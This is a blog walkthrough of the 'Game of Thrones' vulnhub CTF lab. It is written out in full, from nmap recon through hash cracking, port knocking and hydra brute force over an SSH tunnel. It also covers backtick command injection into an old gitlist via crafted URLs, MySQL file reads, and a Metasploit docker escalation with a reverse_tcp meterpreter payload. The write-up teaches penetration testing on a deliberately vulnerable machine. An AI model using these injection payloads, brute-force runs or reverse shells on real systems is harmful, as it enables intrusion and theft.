Lab – Game of Thrones

TV show is finally over.

It’s hard to imagine now, that series premiered back in 2011 and lasted over 8 season. Show was praised by critics and fans alike, generated tons a memes and fan theories. It doesn’t matter that last episode is lowest-ranked episode ever on IMDB. Ever! I can’t agree with this, but it doesn’t matter now. I’m thankful for these 8 years anyway.

I found this CTF machine made by OscarAkaElvis on vulnhub. It’s clearly inspired by Game of Thrones, but goes way beyond it . So, valar morghulis!

(Warning, possible spoilers ahead alert!)
Let’s begin our journey, sir. This might take considerable time, because author promised us 7 flags – one for each kingdom, 3 extra secret flags and one final battle flag. 11 flags, man, it’s going to be long night.  Machine boots to a welcome screen and I’ll try to guess the password. 

login

It fails, so as usual, our battle begins with reconnaissance:

root@kali:~# nmap -sV -sC -O -A 192.168.89.129
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-28 03:26 EDT
Nmap scan report for 192.168.89.129
Host is up (0.00081s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh Linksys WRT45G modified dropbear sshd (protocol 2.0)
| ssh-hostkey:
| 2048 e6:5b:d7:78:6b:86:4f:9b:35:40:9f:c7:1f:dd:0d:9f (RSA)
| 256 b8:e3:30:88:2e:ba:56:f2:49:b0:cc:35:c7:cc:48:06 (ECDSA)
|_ 256 a9:f2:d8:ee:f0:93:49:d8:19:04:ff:ad:89:ee:df:7d (ED25519)
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
| http-robots.txt: 2 disallowed entries
|_/secret-island/ /direct-access-to-kings-landing/
|_http-server-header: Apache
|_http-title: Game of Thrones CTF
143/tcp filtered imap
3306/tcp filtered mysql
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6
10000/tcp open http MiniServ 1.590 (Webmin httpd)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Login to Stormlands
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/28%Time=5CECE2B8%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
MAC Address: 00:0C:29:46:96:1B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Device: router

TRACEROUTE
HOP RTT ADDRESS
1 0.81 ms 192.168.89.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.38 seconds

Oh, great, my little birds got something. I’ll start with the obvious – web server on port 80:

got_01

Theme music started playing in my head. Hey, wait, it actually plays – there’s embedded music file. Let’s look what else in there:

<!--
This is the Game of Thrones CTF v1.0 (September 2017)

Designed by Oscar Alfonso (OscarAkaElvis or v1s1t0r)
Contact: v1s1t0r.1s.h3r3@gmail.com
https://github.com/OscarAkaElvis/game-of-thrones-hacking-ctf

Thanks to the beta testers, specially to j0n3, Kal3l and masAcre

------------------------------------------------------------
_____ __ ___ _
| __|___ _____ ___ ___| _| |_ _|| |_ __ ___ ___ ___ ___
| | | .'| | -_| | . | _| | | | | _| . | | -_|_ -|
|_____|__,|_|_|_|___| |___|_| |_| |_|_|_||___|_|_|___|___|

------------------------------------------------------------

Goal:
-Get the 7 kingdom flags and the 4 extra content flags (3 secret flags + final battle flag). There are 11 in total.

Rules/guidelines to play:
- Start your conquer of the seven kingdoms
- You'll need hacking skills, no Game of Thrones knowledge is required. But if you play, it may contains spoilers of the TV series
- Difficulty of the CTF: Medium-High
- This is the start point, the base camp
- You must travel to westeros. First stop: Dorne. Last stop: King's Landing
- Don't forget to take your map (try to find it). It will guide you about the natural flag order to follow over the kingdoms
- Listen CAREFULLY to the hints. If you are stuck, read the hints again!
- Powerful fail2ban spells were cast everywhere. Bruteforce is not an option for this CTF (2 minutes ban penalty)
- The flags are 32 chars strings. Keep'em all! you'll need them

Good luck, the old gods and the new will protect you!

The game already started!! A couple of hints as a present.

"Everything can be TAGGED in this world, even the magic or the music" - Bronn of the Blackwater

"To enter in Dorne you'll need to be a kind face" - Ellaria Sand
-->

Ok, what else? There’s robots.txt there:

User-agent: Three-eyed-raven
Allow: /the-tree/
User-agent: *
Disallow: /secret-island/
Disallow: /direct-access-to-kings-landing/

This basically means, that only someone with user-agent Three-eyed-raven will be able to read the-tree folder.  If we’ll try it, we’ll fail for sure:

got_03

Poor Jon. But this is not a good way to protect your data since we can forge our user-agent string. Let’s pretend we’re Three-eyed-raven. I’ll use User-agent switched add-on for Firefox.

got_02

Now we can access the-tree folder:

got_04

Ok, Bran, give me some hints. Let’s look for page source:

<!--
"I will give you three hints, I can see the future so listen carefully" - The three-eyed raven Bran Stark

"To enter in Dorne you must identify as oberynmartell. You still should find the password"
"3487 64535 12345 . Remember these numbers, you'll need to use them with POLITE people you'll know when to use them"
"The savages never crossed the wall. So you must look for them before crossing it"
-->

We have a login now (thanks, Bran), and also hint for a password. Let’s check secret-island:

got_05

Sir Baelish wants to be our friend, eh? He’s got a map:

got_06

Now I get it, every kingdom is mapped to a service. How clever. Dorne is ftp and we’ll start from there. We already have a login, but what about password? Let’s look at direct-access-to-kings-landing:

got_06

I remember that guy. Doesn’t matter what he says, he’s dead for three seasons now. Let’s look at page source:

 <!--
"I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark
-->

The only music around here is Game of Thrones theme on a main page. Let’s check this file:

root@kali:~# wget http://192.168.89.129/music/game_of_thrones.mp3
root@kali:~# exiftool game_of_thrones.mp3

Look, file has a comment:

Comment : Savages secret flag: 8bf8854bebe108183caeb845c7676ae4

It’s our first flag (1/11)! I don’t see any more hints, so let’ check this web server little closer:

root@kali:~# dirb http://192.168.89.129

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue May 28 06:35:51 2019
URL_BASE: http://192.168.89.129/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.89.129/ ----
==> DIRECTORY: http://192.168.89.129/css/
+ http://192.168.89.129/favicon.ico (CODE:200|SIZE:1150)
==> DIRECTORY: http://192.168.89.129/h/
==> DIRECTORY: http://192.168.89.129/imgs/
+ http://192.168.89.129/index.php (CODE:200|SIZE:2601)
==> DIRECTORY: http://192.168.89.129/js/
==> DIRECTORY: http://192.168.89.129/music/
+ http://192.168.89.129/robots.txt (CODE:200|SIZE:135)
+ http://192.168.89.129/server-status (CODE:403|SIZE:222)
+ http://192.168.89.129/sitemap.xml (CODE:200|SIZE:214)

---- Entering directory: http://192.168.89.129/css/ ----
+ http://192.168.89.129/css/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.89.129/h/ ----
==> DIRECTORY: http://192.168.89.129/h/i/

---- Entering directory: http://192.168.89.129/imgs/ ----
+ http://192.168.89.129/imgs/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.89.129/js/ ----
+ http://192.168.89.129/js/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.89.129/music/ ----
+ http://192.168.89.129/music/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.89.129/h/i/ ----
==> DIRECTORY: http://192.168.89.129/h/i/d/

---- Entering directory: http://192.168.89.129/h/i/d/ ----
==> DIRECTORY: http://192.168.89.129/h/i/d/d/

---- Entering directory: http://192.168.89.129/h/i/d/d/ ----
==> DIRECTORY: http://192.168.89.129/h/i/d/d/e/

---- Entering directory: http://192.168.89.129/h/i/d/d/e/ ----
==> DIRECTORY: http://192.168.89.129/h/i/d/d/e/n/

---- Entering directory: http://192.168.89.129/h/i/d/d/e/n/ ----
+ http://192.168.89.129/h/i/d/d/e/n/index.php (CODE:200|SIZE:732)

-----------------
END_TIME: Tue May 28 06:37:10 2019
DOWNLOADED: 50732 - FOUND: 10

Ha, look at http://192.168.89.129/h/i/d/d/e/n/

got_07

And the comment here is:

 <!--
"My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys

"Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light has shown me" - The Red Woman Melisandre
-->

We have login and password, let’s go to Dorne (it’s ftp, remember?):

root@kali:~# ftp 192.168.89.129
Connected to 192.168.89.129.
220-------------------------
220-"These are the Dorne city walls. We must enter!" - Grey Worm
220-
220-"A fail2ban spell is protecting these walls. You'll never get in" - One of the Sand Snake Girls
220-------------------------
220 This is a private system - No anonymous login
Name (192.168.89.129:root): oberynmartell
331 User oberynmartell OK. Password required
Password:
230-OK. Current directory is /
230-Welcome to:
230- ____
230-| \ ___ ___ ___ ___
230-| | | . | _| | -_|
230-|____/|___|_| |_|_|___|
230-
230-Principality of Dorne was conquered. This is your first kingdom flag!
230 fb8d98be1265dd88bac522e1b2182140
Remote system type is UNIX.
Using binary mode to transfer files.

We got Dorne flag! (2/11)

There are two files on this server that we have to grab:

ftp> ls
200 PORT command successful
150 Connecting to port 42717
-rw-r--r-- 1 0 0 304 Aug 27 2017 problems_in_the_north.txt
-rw-r--r-- 1 0 0 492 Aug 20 2017 the_wall.txt.nc
226-Options: -l
226 2 matches total
ftp> get problems_in_the_north.txt
local: problems_in_the_north.txt remote: problems_in_the_north.txt
200 PORT command successful
150 Connecting to port 32943
226-File successfully transferred
226 0.000 seconds (measured here), 0.70 Mbytes per second
304 bytes received in 0.00 secs (652.4725 kB/s)
ftp> get the_wall.txt.nc
local: the_wall.txt.nc remote: the_wall.txt.nc
200 PORT command successful
150 Connecting to port 54431
226-File successfully transferred
226 0.001 seconds (measured here), 0.63 Mbytes per second
492 bytes received in 0.00 secs (427.4633 kB/s)

First one contains some hash:

root@kali:~# cat problems_in_the_north.txt

"There are problems in the north. We must travel quickly. Once there we must defend the wall" - Jon Snow

"What kind of magic is this?!? I never saw before this kind of papirus. Let's check it carefully" - Maester Aemon Targaryen

md5(md5($s).$p)

nobody:6000e084bf18c302eae4559d48cb520c$2hY68a

But the second one is encrypted. I guess the passphrase hash is in the first file. And here goes the problem. As described, the hash is in md5 format (md5($salt).$password). I could use hashcat to bruteforce it, but this mode isn’t supported in hashcat anymore. People suggest to use hashcat-legacy, but I could make it work. I made a guess to get md5 hash of 2hY68a and use the following construction

6000e084bf18c302eae4559d48cb520c:0cbb5be2c4504bed573802efbd909965

where 0cbb5be2c4504bed573802efbd909965 is md5 of 2hY68a. This one is supported by hashcat, so let’s rock:

hashcat -a 0 -m 20 hash.txt rockyou.txt --force --outfile=result.txt

It works, our password is stark. Dorne is not about security, right? Now let’s decrypt:

root@kali:~# mcrypt -d the_wall.txt.nc 
Enter passphrase:
File the_wall.txt.nc was decrypted.
root@kali:~# cat the_wall.txt
"We defended the wall. Thanks for your help. Now you can go to recover Winterfell" - Jeor Mormont, Lord Commander of the Night's Watch

"I'll write on your map this route to get faster to Winterfell. Someday I'll be a great maester" - Samwell Tarly

http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
Enter using this user/pass combination:
User: jonsnow
Pass: Ha1lt0th3k1ng1nth3n0rth!!!

This is our path to The Wall. To make things easier I’ll add this record to hosts file. So let’s go there and use our new credentials. Jon has a remarkable password, don’t you think?

got_08

We’re in:

got_09

Source of the page reads:

 <!--
Welcome to Winterfell
You conquered the Kingdom of the North. This is your second kingdom flag!
639bae9ac6b3e1a84cebb7b403297b79

"We must do something here before travelling to Iron Islands, my lady" - Podrick Payne

"Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
-->

And this is a flag (3/11).

There are no more clues here. I’ve checked exif info on pictures here, but no luck. There’s another trick, that comes up from time to time. strings command can show printable characters in file. With stark_shielf.jpg it looks like this:

[_Ok
%oWf,
,G{q
!x#!q
;uf'$
\(=@
rrM}
]oG|
i7:>
qws#K,
drU3
f92jw.O
)99<
"Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy

Iron Islands is DNS on our map, so it’s no doubt that we have to ask for specific DNS-record from there to get our flag. Let’s ask then =)

root@kali:~# nslookup -q=txt TimeF0rconqu3rs.7kingdoms.ctf 192.168.89.129
Server: 192.168.89.129
Address: 192.168.89.129#53

Timef0rconqu3rs.7kingdoms.ctf text = "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"

We’ve conquered Iron Islands kingdom flag (4/11). Plus we have new goal – Stormlands! It gets easier, as we have login and password now. Go, Arya, go:

got_10

“Stannis is legitimate king”? We’ll see about that! This is an older webmin, and it’s a problem here. The only available module here is file manager, and it requires Java, that doesn’t supported in our browser. We need something really outdated. Like Firefox ESR 40-. We have a user access to this server, so let’s look in our home directory:

Welcome to:
_____ _ _ _
| __| |_ ___ ___ _____| |___ ___ _| |___
|__ | _| . | _| | | . | | . |_ -|
|_____|_| |___|_| |_|_|_|_|__,|_|_|___|___|

Congratulations! you conquered Stormlands. This is your flag: 8fc42c6ddf9966db3b09e84365034357

Now prepare yourself for the next challenge!

The credentials to access to the Mountain and the Vale kingdom are:
user/pass: robinarryn/cr0wn_f0r_a_King-_
db: mountainandthevale

pgAdmin magic will not work. Command line should be used on that kingdom - Talisa Maegyr

Got our next flag (5/11) and next hint. We’re going to Mountain and Vale kingdom and according to our map it’s postgresql. I’m no postgresql guru, so I had to google all the syntax. We’ll login as Robin Arryn:

root@kali:~# psql -h 192.168.89.129 mountainandthevale robinarryn
Password for user robinarryn:
psql (11.1 (Debian 11.1-2), server 9.6.4)
Type "help" for help.

mountainandthevale=>

Now check for available databases:

mountainandthevale=> \dv
List of relations
Schema | Name | Type | Owner
--------+------+------+------------
public | flag | view | robinarryn
(1 row)

Let’s elevate our privileges and look in the database

grant all privileges on all tables in schema public to robinarryn;

and

select * from flag;
TmljZSEgeW91IGNvbnF1ZXJlZCB0aGUgS2luZ2RvbSBvZiB0aGUgTW91bnRhaW4gYW5kIHRoZSBWYWxlLiBUaGlzIGlzIHlvdXIgZmxhZzogYmIzYWVjMGZkY2RiYzI5NzQ4OTBmODA1YzU4NWQ0MzIuIE5leHQgc3RvcCB0aGUgS2luZ2RvbSBvZiB0aGUgUmVhY2guIFlvdSBjYW4gaWRlbnRpZnkgeW91cnNlbGYgd2l0aCB0aGlzIHVzZXIvcGFzcyBjb21iaW5hdGlvbjogb2xlbm5hdHlyZWxsQDdraW5nZG9tcy5jdGYvSDFnaC5HYXJkM24ucG93YWggLCBidXQgZmlyc3QgeW91IG11c3QgYmUgYWJsZSB0byBvcGVuIHRoZSBnYXRlcw==
(1 row)

(END)

We’re know what it is, base64:

root@kali:~# echo TmljZSEgeW91IGNvbnF1ZXJlZCB0aGUgS2luZ2RvbSBvZiB0aGUgTW91bnRhaW4gYW5kIHRoZSBWYWxlLiBUaGlzIGlzIHlvdXIgZmxhZzogYmIzYWVjMGZkY2RiYzI5NzQ4OTBmODA1YzU4NWQ0MzIuIE5leHQgc3RvcCB0aGUgS2luZ2RvbSBvZiB0aGUgUmVhY2guIFlvdSBjYW4gaWRlbnRpZnkgeW91cnNlbGYgd2l0aCB0aGlzIHVzZXIvcGFzcyBjb21iaW5hdGlvbjogb2xlbm5hdHlyZWxsQDdraW5nZG9tcy5jdGYvSDFnaC5HYXJkM24ucG93YWggLCBidXQgZmlyc3QgeW91IG11c3QgYmUgYWJsZSB0byBvcGVuIHRoZSBnYXRlcw== | base64 --decode
Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah , but first you must be able to open the gates

Awesome, next flag (6/11) for Mountain and the Vale. Now we’re going to Reach (Halo Reach? nah..). Let’s get back to database and check the database again, there are several tables:

mountainandthevale=> \dt
List of relations
Schema | Name | Type | Owner
--------+---------------------+-------+----------
public | aryas_kill_list | table | postgres
public | braavos_book | table | postgres
public | eyrie | table | postgres
public | popular_wisdom_book | table | postgres
(4 rows)

Tables contain series trivia and quotes. Except for braavos book. Take a look:

    1 | City of Braavos is a very particular place. It is not so far from here.
2 | "There is only one god, and his name is Death. And there is only one thing we say to Death: Not today" - Syrio Forel
3 | Braavos have a lot of curious buildings. The Iron Bank of Braavos, The House of Black and White, The Titan of Braavos, etc.
4 | "A man teaches a girl. -Valar Dohaeris- All men must serve. Faceless Men most of all" - Jaqen H'ghar
6 | "A girl has no name" - Arya Stark
7 | City of Braavos is ruled by the Sealord, an elected position.
8 | "That man's life was not yours to take. A girl stole from the Many-Faced God. Now a debt is owed" - Jaqen H'ghar
9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
(8 rows)

Under number 9 this looks like normal not encrypted text except for that all the letters are messed up. It’s called Caesar cipher, I’ll use https://www.rot13.com/ to decode it.

The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis

Did you notice anything else here? Number 5 is missing. Let’s remember that. Let’s look at Arya’s kill list:

mountainandthevale=> select * from aryas_kill_list
;
id| name | why
--+-----------------------+---------------------------------------
1 | WalderFrey | For orchestrating the Red Wedding
2 | CerseiLannister | For her role in Ned Starks death
3 | TheMountain | For the torture at Harrenhal
4 | TheHound | For killing Mycah, the butchers boy
5 | TheRedWomanMelisandre | For kidnapping Gendry
6 | BericDondarrion | For selling Gendry to Melisandre
7 | ThorosofMyr | For selling Gendry to Melisandre
8 | IlynPayne | For executing Ned Stark
9 | MerynTrant | For killing Syrio Forel
10 | JoffreyBaratheon | For ordering Ned Starks execution
11 | TywinLannister | For orchestrating the Red Wedding
12 | Polliver | For killing Lommy, stealing Needle and the torture at Harrenhal
13 | Rorge | For the torture at Harrenhal and threatening to rape her
(13 rows)

Maybe number 5 here is our login? Let’s check it:

root@kali:~# psql -h 192.168.89.129 braavos TheRedWomanMelisandre
Password for user TheRedWomanMelisandre:
psql (11.1 (Debian 11.1-2), server 9.6.4)
Type "help" for help.

braavos=> \dt
List of relations
Schema | Name | Type | Owner
--------+----------------------------+-------+----------
public | temple_of_the_faceless_men | table | postgres
(1 row)

braavos=> select * from temple_of_the_faceless_men;

flag | text
----------------------------------+---------------------------------------
3f82c41a70a8b0cfec9052252d9fd721 | Congratulations. You've found the secret flag at City of Braavos. You've served well to the Many-Faced God.
(1 row)

Braavos flag, join the others (7/11). Ok, we’re leaving Braavos and heading to Reach, that is associated with IMAP on Baelish’s map. Let’s connect to IMAP:

root@kali:~# telnet 192.168.89.129 143
Trying 192.168.89.129...

Eh… port is closed. Nmap describes it as filtered. This is another technique called “port knocking” that you’ll probably never see in real life. Remember Bran told us three numbers?  3487, 64535 and 12345 are ports that we must knock before attempting to connect:

root@kali:~# knock -v 192.168.89.129 3487:tcp 64535:tcp 12345:tcp
hitting tcp 192.168.89.129:3487
hitting tcp 192.168.89.129:64535
hitting tcp 192.168.89.129:12345
root@kali:~# nc 192.168.89.129 143
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=LOGIN AUTH=PLAIN] Kingdom of the Reach

We’re in. Now we must browse IMAP folders to find something. But we’re lazy here, so I just set up email client to get all the mail from mailbox:

got_11

We got another flag (8/11). Out next stop is The Rock (gitlist and mysql) and we even have proper credentials this time:

got_12

This is gitlist all right as previous hint suggested. There are just three files there, one of which caught my attention:

got_13

This mysterious string is obviously hex encoded text. Isn’t it funny how we learn to identify things without actually reading it? Let’s decode:

root@kali:~# echo 2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874 | xxd -r -p
/home/tyrionlannister/checkpoint.txt

So this is a link, but we don’t have direct access to browse files, so we can’t just copy and paste it. Fortunately it’s a really old gitlist, so there are bunch of available exploits in exploit-db. Our case is number 33929, that makes possible remote command execution. We’re here for a single file, so it might work:

http://192.168.89.129:1337/casterly-rock/blob/master/%60cat%20/home/tyrionlannister/checkpoint.txt%60

Don’t forget to encode special symbols! We got it, response reads:

Oops! fatal: failed to stat 'master:Welcome to: _____ _ _____ _ |_ _| |_ ___ | __ |___ ___| |_ | | | | -_| | -| . | _| '_| |_| |_|_|___| |__|__|___|___|_,_| You are very close to get the flag. Is not here, it's at King's Landing. We must travel there from here! The credentials to access to King's Landing are: user/pass: cerseilannister/_g0dsHaveNoMercy_ db: kingslanding "Chaos isn't a pit. Chaos is a ladder" - Petyr (Littlefinger) Baelish ': File name too long

Oh, Cersei has an access to database, but how do we get it? Via browser? I’m bad at this, so I asked for little help here:

http://192.168.89.129:1337/casterly-rock/blob/master/%22%22%60mysql%20-h%20192.168.89.129%20-u%20cerseilannister%20-p_g0dsHaveNoMercy_%20-D%20kingslanding%20-e%20%22show%20tables;%22%20%60/

got_14

So there’s iron_throne. Let’s check:

http://192.168.89.129:1337/casterly-rock/tree/master/%22%22%60mysql%20-h%20192.168.89.129%20-u%20cerseilannister%20-p_g0dsHaveNoMercy_%20-D%20kingslanding%20-e%20%22select%20*%20from%20iron_throne;%22%20%60/

got_15

You’ve got to be kidding? Morse code? In King’s landing?

got_16

Anyway, we don’t have an access to it. I’ve already seen this scenario, the trick here is to create a table and paste contents of this file inside this table. Commands are all trial and error, but eventually i got this:

http://192.168.89.129:1337/casterly-rock/tree/master/""`mysql -h 192.168.89.129 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding -e "select * from iron_throne;" `/

http://192.168.89.129:1337/casterly-rock/tree/master/""`mysql -h 192.168.89.129 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding -e "show grants for current_user;" `/

http://192.168.89.129:1337/casterly-rock/tree/master/""`mysql -h 192.168.89.129 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding -e "CREATE TABLE gotctf (toto VARCHAR(400));" `/

http://192.168.89.129:1337/casterly-rock/tree/master/""`mysql -h 192.168.89.129 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding -e "LOAD data INFILE '/etc/mysql/flag' INTO TABLE gotctf;" `/

http://192.168.89.129:1337/casterly-rock/tree/master/""`mysql -h 192.168.89.129 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding -e "select * from gotctf;" `/

gotctf is my new table here. It worked as expect and now we see the output:

Congratulations. You conquered the last kingdom flag. This is your flag: c8d46d341bea4fd5bff866a65ff8aea9 Now you must find the Dragonglass mine to forge stronger weapons. Ssh user-pass: daenerystargaryen-.Dracarys4thewin. "All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons Congratulations. You conquered the last kingdom flag. This is your flag: c8d46d341bea4fd5bff866a65ff8aea9 Now you must find the Dragonglass mine to forge stronger weapons. Ssh user-pass: daenerystargaryen-.Dracarys4thewin. "All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons/ 

This a last kingdom flag (9/11).Now we must go into Dragonglass mine for another hidden flag, and there’s also final battle flag somewhere. Let’s connect to the mine and see what’s in there:

root@kali:~# ssh daenerystargaryen@192.168.89.129
daenerystargaryen@192.168.89.129's password:
daenerystargaryen@7kingdoms:~$ ls
checkpoint.txt digger.txt

daenerystargaryen@7kingdoms:~$ cat checkpoint.txt

"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre

"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly

"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow

So inside we see two text files. digger.txt contains list of random words, while checkpoint.txt contains directions for the next flag. It seems that we need to bruteforce root account with given wordlist. The catch here that there’s no hyrda on this host, so we need to create ssh tunnel between our Kali box and 172.50.0.2. First, let’s grab wordlist:

root@kali:~# scp daenerystargaryen@192.168.89.129:/home/daenerystargaryen/digger.txt /root/digger.txt

Next let’s open ssh tunnel to 172.25.0.2 via 192.168.89.129:

root@kali:~# ssh daenerystargaryen@192.168.89.129 -L 6666:172.25.0.2:22 -N
daenerystargaryen@192.168.89.129's password:

And then run hydra in another terminal window:

root@kali:~# hydra -l root -P digger.txt ssh://localhost:6666
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

[DATA] max 16 tasks per 1 server, overall 16 tasks, 1001 login tries (l:1/p:1001), ~63 tries per task
[DATA] attacking ssh://localhost:6666/

[6666][ssh] host: localhost login: root password: Dr4g0nGl4ss!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-05-30 04:36:18

And here’s our password – Dr4g0nGl4ss!. Deep in in Dragonglass mine we’ll find our flag:

daenerystargaryen@7kingdoms:~$ ssh root@172.25.0.2
root@172.25.0.2's password:

You found the
___ _
| \ ___ ___ ___ ___ ___ ___| |___ ___ ___
| | | _| .'| . | . | | . | | .'|_ -|_ -|
|____/|_| |__,|_ |___|_|_|_ |_|__,|___|___|
|___| |___|
_
_____|_|___ ___
| | | | -_|
|_|_|_|_|_|_|___|

root@1558d33076eb:~# ls
flag.txt
root@1558d33076eb:~# cat flag.txt
Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9

Now you have the Dragonglass weapons to fight against the White Walkers.

Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven

"The time has come" - The Three Eyed Raven

Well, Three Eyed Raven is right. Bran will be the king, so let’s login with his credentials and check his home directory:

root@kali:~# ssh branstark@192.168.89.129
branstark@192.168.89.129's password:
_____ _ _ _____ _ _ _
| __|_|___ ___| | | __ |___| |_| |_| |___
| __| | | .'| | | __ -| .'| _| _| | -_|
|__| |_|_|_|__,|_| |_____|__,|_| |_| |_|___|

branstark@7kingdoms:~$ ls
checkpoint.txt
branstark@7kingdoms:~$ cat checkpoint.txt

Now you are ready to face the final battle!! Try to escalate to root.

"Seven blessings to all of you and good luck" - Game of Thrones CTF master ;)

So Bran IS the King, but has no root access to his kingdom. Check this out:

branstark@7kingdoms:/$ id
uid=1001(branstark) gid=1001(branstark) groups=1001(branstark),999(docker)

It seems, that all the way we were inside Docker container. We’ll use Metasploit to elevate priveleges:

=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]

msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > RHOSTS 192.168.89.129
[-] Unknown command: RHOSTS.
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.89.129
RHOSTS => 192.168.89.129
msf5 auxiliary(scanner/ssh/ssh_login) > set username branstark
username => branstark
msf5 auxiliary(scanner/ssh/ssh_login) > use password Th3_Thr33_Ey3d_Raven
^C[-] use: Interrupted
msf5 auxiliary(scanner/ssh/ssh_login) > set password Th3_Thr33_Ey3d_Raven
password => Th3_Thr33_Ey3d_Raven
msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 192.168.89.129:22 - Success: 'branstark:Th3_Thr33_Ey3d_Raven' 'uid=1001(branstark) gid=1001(branstark) groups=1001(branstark),999(docker) Linux 7kingdoms 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.89.150:37391 -> 192.168.89.129:22) at 2019-05-30 05:03:40 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/docker_daemon_privilege_escalation
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > set LHOST 192.168.89.150
LHOST => 192.168.89.150
msf5 exploit(linux/local/docker_daemon_privilege_escalation) > run

We’re in as root. Let’s grab everything from home directory. Final_battle file password protected archive with final flag, while checkpoint.txt gives us the idea of how to get the password:

root@kali:~# cat checkpoint.txt

To defeat White Walkers you need the help of the Savages, the Many-Faced God skill learned at Braavos and the Dragonglass weapons

Some hints:

type of file = ???
pass = ???
